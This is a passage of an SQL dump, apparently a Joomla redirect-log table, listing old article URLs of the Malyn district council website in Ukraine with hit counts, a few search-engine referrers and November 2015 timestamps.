00:00:00',301),(18686,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/806-pro-hid-vikonannja-rajonnoi-programi-vidpochinku_5','','','',14,0,'2015-11-15 06:00:36','0000-00-00 00:00:00',301),(18687,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=724:-27042012252&catid=43&Itemid=82&lang=uk','','','',9,0,'2015-11-15 06:06:32','0000-00-00 00:00:00',301),(18689,'http://www.malyn-rayrada.org.ua/index.php/1099-vidbulas-39-sesiya-rajonnoji-radi','','','',31,0,'2015-11-15 07:13:08','0000-00-00 00:00:00',301),(18690,'http://www.malyn-rayrada.org.ua/index.php?Itemid=13&catid=8&id=10:2010-06-05-15-11-20&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-15 07:41:57','0000-00-00 00:00:00',301),(18691,'http://malyn-rayrada.org.ua/index.php/523-vidbulas-21-pozachergova-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-15 08:44:51','0000-00-00 00:00:00',301),(18692,'http://malyn-rayrada.org.ua/index.php/562-upravlinnja-statistiki-informue?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-15 08:44:52','0000-00-00 00:00:00',301),(18693,'http://malyn-rayrada.org.ua/index.php/648-ogoloshennja-povtornij-konkurs','','','',2,0,'2015-11-15 08:44:54','0000-00-00 00:00:00',301),(18694,'http://malyn-rayrada.org.ua/index.php/670-7-grudnja-den-miscevogo-samovrjaduvannja','','','',2,0,'2015-11-15 08:44:55','0000-00-00 00:00:00',301),(18695,'http://malyn-rayrada.org.ua/index.php/671-do-dnja-miscevogo-samovrjaduvannja','','','',1,0,'2015-11-15 08:44:56','0000-00-00 00:00:00',301),(18696,'http://malyn-rayrada.org.ua/index.php/671-do-dnja-miscevogo-samovrjaduvannja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-15 08:44:58','0000-00-00 00:00:00',301),(18697,'http://malyn-rayrada.org.ua/index.php/672-upravlinnja-statistiki-informue_4','','','',2,0,'2015-11-15 08:44:59','0000-00-00 00:00:00',301),(18698,'http://malyn-rayrada.org.ua/index.php/701-vidbulas-viizna-koordinacijna-rada-v-ljubovichah?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-15 08:45:01','0000-00-00 00:00:00',301),(18699,'http://malyn-rayrada.org.ua/index.php/816-golovne-upravlinnja-derzhzemagentstva-u?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-15 08:45:07','0000-00-00 00:00:00',301),(18700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=597:-l-r-2011-&catid=40&Itemid=77&lang=uk','','','',2,0,'2015-11-15 08:55:05','0000-00-00 00:00:00',301),(18702,'http://www.malyn-rayrada.org.ua/index.php/642-vijshli-na-finishnu-prjamu','','','',25,0,'2015-11-15 11:17:03','0000-00-00 00:00:00',301),(18704,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/205-pro-programu-zabezpechennja-deputatskoi-dijalnosti','','','',15,0,'2015-11-15 13:25:02','0000-00-00 00:00:00',301),(18705,'http://www.malyn-rayrada.org.ua/index.php?Itemid=18&catid=15:2010-06-06-09-34-01&id=862:-qq&lang=en&option=com_content&view=article','','','',1,0,'2015-11-15 14:00:10','0000-00-00 00:00:00',301),(18706,'http://www.malyn-rayrada.org.ua/index.php/711-vidbulosja-pidpisannja-ugodi-pro-vreguljuvannja?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-15 14:50:46','0000-00-00 00:00:00',301),(18707,'http://www.malyn-rayrada.org.ua/index.php/620-z-svjatom-osvitjani','','','',25,0,'2015-11-15 16:19:12','0000-00-00 00:00:00',301),(18708,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/398-pro-vnesennja-do-pereliku-ob’ektiv-shho','','','',3,0,'2015-11-15 16:19:14','0000-00-00 00:00:00',301),(18709,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=701:-2011-2017-&catid=43:--25072012-&Itemid=82&lang=uk','','','',1,0,'2015-11-15 16:19:14','0000-00-00 00:00:00',301),(18710,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45:--14112012-&Itemid=84&lang=uk','','','',5,0,'2015-11-15 16:19:20','0000-00-00 00:00:00',301),(18711,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12092012-/142-pro-nadannja-dozvolu-na-vidchuzhennja-ob’ekta','','','',3,0,'2015-11-15 16:19:48','0000-00-00 00:00:00',301),(18712,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=en&start=7','','','',2,0,'2015-11-15 16:19:50','0000-00-00 00:00:00',301),(18713,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=ru&start=14','','','',27,0,'2015-11-15 16:19:50','0000-00-00 00:00:00',301),(18714,'http://www.malyn-rayrada.org.ua/index.php/592-vitaemo-iz-svjatom-pershogo-dzvonika_2','','','',20,0,'2015-11-15 16:20:08','0000-00-00 00:00:00',301),(18715,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45&Itemid=84&lang=uk','','','',3,0,'2015-11-15 16:20:08','0000-00-00 00:00:00',301),(18716,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=463:-2007-2015-&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-15 16:20:11','0000-00-00 00:00:00',301),(18717,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=464:2011-11-11-12-15-19&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-15 16:20:13','0000-00-00 00:00:00',301),(18718,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38&Itemid=73&lang=uk','','','',1,0,'2015-11-15 16:20:15','0000-00-00 00:00:00',301),(18719,'http://www.malyn-rayrada.org.ua/index.php/539-malinska-rajonna-rada-shhiro-vitae-vas-iz-dnem','','','',8,0,'2015-11-15 16:20:40','0000-00-00 00:00:00',301),(18720,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=579:-2011-2015-&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:20:41','0000-00-00 00:00:00',301),(18721,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=580:-l-r-2012-2016-&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:20:42','0000-00-00 00:00:00',301),(18722,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=728:2012-06-26-07-51-10&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-15 16:20:43','0000-00-00 00:00:00',301),(18723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=583:-l-lr&catid=40:--28032012-&Itemid=77&lang=uk','','','',3,0,'2015-11-15 16:20:43','0000-00-00 00:00:00',301),(18724,'http://www.malyn-rayrada.org.ua/index.php/477-priznachennja-tizhnja_2','','','',18,0,'2015-11-15 16:20:44','0000-00-00 00:00:00',301),(18725,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=723:2012-06-18-14-29-08&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:20:44','0000-00-00 00:00:00',301),(18726,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=592:2012-02-27-15-06-10&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:20:45','0000-00-00 00:00:00',301),(18727,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=721:-lr&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:20:47','0000-00-00 00:00:00',301),(18728,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=720:-l-r&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:20:49','0000-00-00 00:00:00',301),(18729,'http://www.malyn-rayrada.org.ua/index.php/888-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-9-misyatsiv-2014-roku','','','',18,0,'2015-11-15 16:20:49','0000-00-00 00:00:00',301),(18730,'http://www.malyn-rayrada.org.ua/index.php/184-vitaemo-viktora-kostereva-z-nagorodoju','','','',13,0,'2015-11-15 16:21:12','0000-00-00 00:00:00',301),(18731,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-05-12-54-02/59-rishennja-radi/rishennja/-22022012-?lang=en&start=14','','','',4,0,'2015-11-15 16:21:21','0000-00-00 00:00:00',301),(18732,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk&limitstart=5','','','',3,0,'2015-11-15 16:21:44','0000-00-00 00:00:00',301),(18733,'http://www.malyn-rayrada.org.ua/index.php/1073-15-kvitnya-blagodijnij-kontsert-v-rbk','','','',23,0,'2015-11-15 16:21:45','0000-00-00 00:00:00',301),(18734,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=641:2012-04-03-12-52-00&catid=32&Itemid=64&lang=ru','','','',1,0,'2015-11-15 16:21:46','0000-00-00 00:00:00',301),(18735,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=643:-6-&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:21:46','0000-00-00 00:00:00',301),(18736,'http://www.malyn-rayrada.org.ua/index.php/646-shhe-odin-krok-do-zavershennja-vporjadkuvannja','','','',41,0,'2015-11-15 16:22:11','0000-00-00 00:00:00',301),(18737,'http://www.malyn-rayrada.org.ua/index.php/644-dodatkovu-dotaciju-z-derzhavnogo-bjudzhetu','','','',13,0,'2015-11-15 16:22:13','0000-00-00 00:00:00',301),(18738,'http://www.malyn-rayrada.org.ua/index.php/641-pitannja-rozrahunkiv-rozporjadnikiv-koshtiv','','','',14,0,'2015-11-15 16:22:14','0000-00-00 00:00:00',301),(18739,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=835:2012-12-02-07-47-14&catid=11&Itemid=14&lang=uk','','','',6,0,'2015-11-15 16:22:23','0000-00-00 00:00:00',301),(18740,'http://www.malyn-rayrada.org.ua/index.php/590-pro-sklikannja-24-sesii-rajonnoi-radi-6-sklikannja','','','',17,0,'2015-11-15 16:22:25','0000-00-00 00:00:00',301),(18741,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=475:2011-11-22-07-58-34&catid=38&Itemid=73&lang=uk','','','',3,0,'2015-11-15 16:22:29','0000-00-00 00:00:00',301),(18742,'http://www.malyn-rayrada.org.ua/index.php/548-upravlinnja-veterinarnoi-medicini-v-malinskomu?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-15 16:22:30','0000-00-00 00:00:00',301),(18743,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=540:-2010-2015-&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-15 16:22:31','0000-00-00 00:00:00',301),(18744,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/164-pro-hid-vikonannja-rajonnoi-programi-pidtrimki','','','',13,0,'2015-11-15 16:22:54','0000-00-00 00:00:00',301),(18745,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=843:-l-r&catid=46&Itemid=85&lang=uk','','','',1,0,'2015-11-15 16:22:55','0000-00-00 00:00:00',301),(18746,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=821:------12--2012--311-l------------r&catid=45&Itemid=84&lang=uk','','','',1,0,'2015-11-15 16:22:58','0000-00-00 00:00:00',301),(18747,'http://www.malyn-rayrada.org.ua/index.php/683-operativi-dani-pro-rozpodil-dodatkovoi-subvencii-z?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-15 16:23:01','0000-00-00 00:00:00',301),(18748,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=816:2012-11-14-16-33-01&catid=45&Itemid=84&lang=uk','','','',5,0,'2015-11-15 16:23:02','0000-00-00 00:00:00',301),(18749,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=552:2012-01-26-12-47-12&catid=39:-22022012-&Itemid=76&lang=uk','','','',1,0,'2015-11-15 16:23:23','0000-00-00 00:00:00',301),(18750,'http://www.malyn-rayrada.org.ua/index.php/547-pro-zatverdzhennja-porjadku-ta-umov-viznachennja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-11-15 16:23:23','0000-00-00 00:00:00',301),(18751,'http://www.malyn-rayrada.org.ua/index.php/523-vidbulas-21-pozachergova-sesija-rajonnoi-radi','','','',15,0,'2015-11-15 16:23:27','0000-00-00 00:00:00',301),(18752,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=581:2012-02-27-13-13-19&catid=40&Itemid=77&lang=uk','','','',3,0,'2015-11-15 16:23:28','0000-00-00 00:00:00',301),(18753,'http://www.malyn-rayrada.org.ua/index.php/502-informacija-pro-provedennja-aukcionu-gazeta','','','',16,0,'2015-11-15 16:23:30','0000-00-00 00:00:00',301),(18754,'http://www.malyn-rayrada.org.ua/index.php/483-zaversheno-pidgotovku-do-17-sesii-malinskoi','','','',33,0,'2015-11-15 16:23:31','0000-00-00 00:00:00',301),(18755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=589:2012-02-27-13-52-30&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:23:32','0000-00-00 00:00:00',301),(18757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=593:-lr&catid=40&Itemid=77&lang=uk','','','',3,0,'2015-11-15 16:23:33','0000-00-00 00:00:00',301),(18758,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',3,0,'2015-11-15 16:23:53','0000-00-00 00:00:00',301),(18759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=549:-2010-2012-&catid=39&Itemid=76&lang=uk','','','',3,0,'2015-11-15 16:23:53','0000-00-00 00:00:00',301),(18760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=771:-2012-2015-&catid=45&Itemid=84&lang=uk','','','',6,0,'2015-11-15 16:23:56','0000-00-00 00:00:00',301),(18761,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/630-pro-orendu-ob’ekta-spilnoi-vlasnosti-teritorialnih','','','',3,0,'2015-11-15 16:23:58','0000-00-00 00:00:00',301),(18762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=565:2012-02-03-09-48-29&catid=39&Itemid=76&lang=uk','','','',1,0,'2015-11-15 16:23:59','0000-00-00 00:00:00',301),(18763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=744:2012-07-28-09-50-03&catid=11&lang=ru','','','',1,0,'2015-11-15 16:24:00','0000-00-00 00:00:00',301),(18764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=616:----l-r&catid=40:--28032012-&Itemid=77&lang=uk','','','',5,0,'2015-11-15 16:24:22','0000-00-00 00:00:00',301),(18765,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=719:-lr&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:24:27','0000-00-00 00:00:00',301),(18766,'http://www.malyn-rayrada.org.ua/index.php/885-14-zhovtnya-svyato-pokrovi-presvyatoji-bogoroditsi','','','',8,0,'2015-11-15 16:24:28','0000-00-00 00:00:00',301),(18767,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=712:2012-06-14-15-11-24&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:24:35','0000-00-00 00:00:00',301),(18768,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=710:2012-06-14-15-07-29&catid=43&Itemid=82&lang=uk','','','',3,0,'2015-11-15 16:24:36','0000-00-00 00:00:00',301),(18769,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=621:-2012-&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:24:37','0000-00-00 00:00:00',301),(18770,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42:--16052012-&Itemid=80&lang=uk','','','',4,0,'2015-11-15 16:24:37','0000-00-00 00:00:00',301),(18771,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=640:2012-04-03-12-44-22&catid=42:--16052012-&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:24:38','0000-00-00 00:00:00',301),(18772,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=640:2012-04-03-12-44-22&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:24:38','0000-00-00 00:00:00',301),(18773,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=664:-------------l-r-lr&catid=41&Itemid=78&lang=uk','','','',1,0,'2015-11-15 16:24:53','0000-00-00 00:00:00',301),(18774,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=677:------------2012-2015-&catid=42&Itemid=80&lang=uk','','','',2,0,'2015-11-15 16:24:54','0000-00-00 00:00:00',301),(18775,'http://www.malyn-rayrada.org.ua/index.php/647-9-listopada-den-ukrainskoi-pisemnosti-ta-movi?tmpl=component&print=1&layout=default&page=','','','',9,0,'2015-11-15 16:25:01','0000-00-00 00:00:00',301),(18776,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',6,0,'2015-11-15 16:25:41','0000-00-00 00:00:00',301),(18777,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',5,0,'2015-11-15 16:25:41','0000-00-00 00:00:00',301),(18778,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa','','','',1,0,'2015-11-15 16:25:43','0000-00-00 00:00:00',301),(18779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=38&Itemid=73&lang=uk&limitstart=10','','','',4,0,'2015-11-15 16:25:49','0000-00-00 00:00:00',301),(18780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=617:-----l---28r-----&catid=40&Itemid=77&lang=uk','','','',1,0,'2015-11-15 16:26:14','0000-00-00 00:00:00',301),(18781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=711:2012-06-14-15-09-26&catid=43&Itemid=82&lang=uk','','','',2,0,'2015-11-15 16:26:15','0000-00-00 00:00:00',301),(18782,'http://www.malyn-rayrada.org.ua/index.php/1071-narada-za-uchastyu-nachalnika-oblasnogo-kaznachejstva-petra-chornogo','','','',47,0,'2015-11-15 16:26:15','0000-00-00 00:00:00',301),(18783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=633:-2015-&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:26:15','0000-00-00 00:00:00',301),(18784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=637:2012-04-03-12-34-11&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:26:16','0000-00-00 00:00:00',301),(18785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=706:-qq-2012-2015-&catid=43&Itemid=82&lang=uk','','','',4,0,'2015-11-15 16:26:16','0000-00-00 00:00:00',301),(18786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=649:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',1,0,'2015-11-15 16:26:17','0000-00-00 00:00:00',301),(18787,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=705:-l-r&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-15 16:26:19','0000-00-00 00:00:00',301),(18788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=704:-20-2011-108-l-r-&catid=43&Itemid=82&lang=uk','','','',1,0,'2015-11-15 16:26:20','0000-00-00 00:00:00',301),(18789,'http://www.malyn-rayrada.org.ua/index.php/656-pro-vnesennja-zmin-do-rozporjadzhennja-golovi','','','',17,0,'2015-11-15 16:26:22','0000-00-00 00:00:00',301),(18790,'http://www.malyn-rayrada.org.ua/index.php/645-pro-nadannja-praktichnoi-dopomogi-u-vidnovlenni','','','',19,0,'2015-11-15 16:26:45','0000-00-00 00:00:00',301),(18791,'http://www.malyn-rayrada.org.ua/index.php/626-vidbulos-zasidannja-koordinacijnoi-radi-pri-golovi','','','',32,0,'2015-11-15 16:26:51','0000-00-00 00:00:00',301),(18792,'http://www.malyn-rayrada.org.ua/index.php/1013-vidpovid-na-zvernennya-deputativ-rajonnoji-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-15 17:09:40','0000-00-00 00:00:00',301),(18793,'http://www.malyn-rayrada.org.ua/index.php/1209-pishov-z-zhittya-volodimir-melnichenko?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-15 17:45:33','0000-00-00 00:00:00',301),(18794,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46:--21122012&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',3,0,'2015-11-15 18:10:27','0000-00-00 00:00:00',301),(18795,'http://malyn-rayrada.org.ua/index.php/628-girnichovidobuvni-pidpriemstva-oblasti-pid','','','',5,0,'2015-11-15 18:41:00','0000-00-00 00:00:00',301),(18797,'http://www.malyn-rayrada.org.ua/index.php/517-vidbulas-20-sesija-rajonnoi-radi?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-15 19:56:57','0000-00-00 00:00:00',301),(18799,'http://www.malyn-rayrada.org.ua/index.php/1214-naperedodni-mistsevikh-viboriv-malinskij-mrv-usbu-v-zhitomirskij-oblasti-nagadue-telefon-doviri','','','',20,0,'2015-11-15 21:08:44','0000-00-00 00:00:00',301),(18800,'http://www.malyn-rayrada.org.ua/index.php/1212-viddil-statistiki-u-malinskomu-rajoni-informue','','','',20,0,'2015-11-15 21:08:52','0000-00-00 00:00:00',301),(18801,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/861-pro-nadannya-dozvolu-na-vlashtuvannya-martinenko-l-ya-do-chopovitskogo-statsionarnogo-viddilennya-postijnogo-prozhivannya-odinokikh-nepratsezdatnikh-gromadyan','','','',12,0,'2015-11-15 21:29:55','0000-00-00 00:00:00',301),(18802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=201:--------l-r--2011--&catid=29:--15122010-&Itemid=60&lang=en','','','',1,0,'2015-11-15 21:30:18','0000-00-00 00:00:00',301),(18803,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-?lang=en&start=35','','','',3,0,'2015-11-15 21:40:17','0000-00-00 00:00:00',301),(18804,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--28032012-/269-pro-vnesennja-zmin-do-rajonnoi-programi-rozvitku','','','',27,0,'2015-11-15 21:48:17','0000-00-00 00:00:00',301),(18805,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=314:2011-05-20-13-01-00&lang=uk&option=com_content&view=article','','','',3,0,'2015-11-15 21:51:09','0000-00-00 00:00:00',301),(18806,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-?limitstart=0','','','',6,0,'2015-11-15 22:03:35','0000-00-00 00:00:00',301),(18807,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=820:2012-11-14-16-42-11&catid=45:--14112012-&Itemid=84&lang=en','','','',38,0,'2015-11-15 22:51:28','0000-00-00 00:00:00',301),(18808,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=820:2012-11-14-16-42-11&lang=uk&option=com_content&view=article','','','',5,0,'2015-11-15 22:59:25','0000-00-00 00:00:00',301),(18809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=913:-l-28r-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',13,0,'2015-11-15 23:05:26','0000-00-00 00:00:00',301),(18810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43:--25072012-&Itemid=82&lang=uk','','','',3,0,'2015-11-15 23:44:23','0000-00-00 00:00:00',301),(18811,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/910-pro-pereukladennya-kontraktiv-z-kerivnikami-pidpriemstv-ustanov-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu','','','',27,0,'2015-11-15 23:45:06','0000-00-00 00:00:00',301),(18812,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=834:-20-&Itemid=14&lang=ru&option=com_content&view=article','','','',8,0,'2015-11-16 00:40:14','0000-00-00 00:00:00',301),(18813,'http://www.malyn-rayrada.org.ua/index.php/1126-viddil-statistiki-u-malinskomu-rajoni-informue-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-traven-2015-roku?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 00:54:28','0000-00-00 00:00:00',301),(18814,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1150-dibrivska-silska-rada-informue?layout=default&page=&print=1&tmpl=component','','http://go.mail.ru/search_images','',1,0,'2015-11-16 01:01:58','0000-00-00 00:00:00',301),(18815,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=10:2010-06-05-15-11-20&catid=8:2010-06-05-12-54-02&Itemid=13&lang=en','','','',3,0,'2015-11-16 01:24:27','0000-00-00 00:00:00',301),(18816,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik','','','',19,0,'2015-11-16 01:25:01','0000-00-00 00:00:00',301),(18817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',7,0,'2015-11-16 02:16:15','0000-00-00 00:00:00',301),(18818,'http://malyn-rayrada.org.ua/index.php/40-vitaemo-zi-svjatom-hristovogo-voskresinnja?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 02:24:50','0000-00-00 00:00:00',301),(18819,'http://malyn-rayrada.org.ua/index.php/463-sogodni-pravoslavni-hristijani-vidznachajut-verbnu','','','',9,0,'2015-11-16 02:24:52','0000-00-00 00:00:00',301),(18820,'http://malyn-rayrada.org.ua/index.php/48-zustrich-iz-vchiteljami?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 02:24:53','0000-00-00 00:00:00',301),(18821,'http://malyn-rayrada.org.ua/index.php/516-zaversheno-pidgotovku-do-provedennja-20-sesii?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 02:24:55','0000-00-00 00:00:00',301),(18822,'http://malyn-rayrada.org.ua/index.php/540-malinchani-budte-oberezhnimi-pid-chas-moroziv-i_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 02:24:56','0000-00-00 00:00:00',301),(18823,'http://malyn-rayrada.org.ua/index.php/565-vikonannja-dohidnoi-chastini-miscevih-bjudzhetiv','','','',6,0,'2015-11-16 02:24:58','0000-00-00 00:00:00',301),(18824,'http://malyn-rayrada.org.ua/index.php/589-pogodzhennja-na-remont-navchalnogo-zakladu-v-smt','','','',4,0,'2015-11-16 02:24:59','0000-00-00 00:00:00',301),(18825,'http://malyn-rayrada.org.ua/index.php/590-pro-sklikannja-24-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 02:25:01','0000-00-00 00:00:00',301),(18826,'http://malyn-rayrada.org.ua/index.php/614-osvoennja-novoi-profesii-abo-pidvishhennja?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 02:25:02','0000-00-00 00:00:00',301),(18827,'http://malyn-rayrada.org.ua/index.php/616-narodnij-deputat-ukraini-zhuravskij-trimae-slovo','','','',9,0,'2015-11-16 02:25:04','0000-00-00 00:00:00',301),(18828,'http://malyn-rayrada.org.ua/index.php/648-ogoloshennja-povtornij-konkurs?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 02:25:06','0000-00-00 00:00:00',301),(18829,'http://malyn-rayrada.org.ua/index.php/650-pro-sklikannja-25-pozachergovoi-sesii-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-16 02:25:07','0000-00-00 00:00:00',301),(18830,'http://malyn-rayrada.org.ua/index.php/673-informacija-pro-vikonannja-dohidnoi-chastini_2','','','',6,0,'2015-11-16 02:25:09','0000-00-00 00:00:00',301),(18831,'http://malyn-rayrada.org.ua/index.php/704-malinskij-rajon-iz-bjudzhetom-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 02:25:10','0000-00-00 00:00:00',301),(18832,'http://malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-16 02:25:12','0000-00-00 00:00:00',301),(18833,'http://malyn-rayrada.org.ua/index.php/707-ogoloshennja_12','','','',6,0,'2015-11-16 02:25:14','0000-00-00 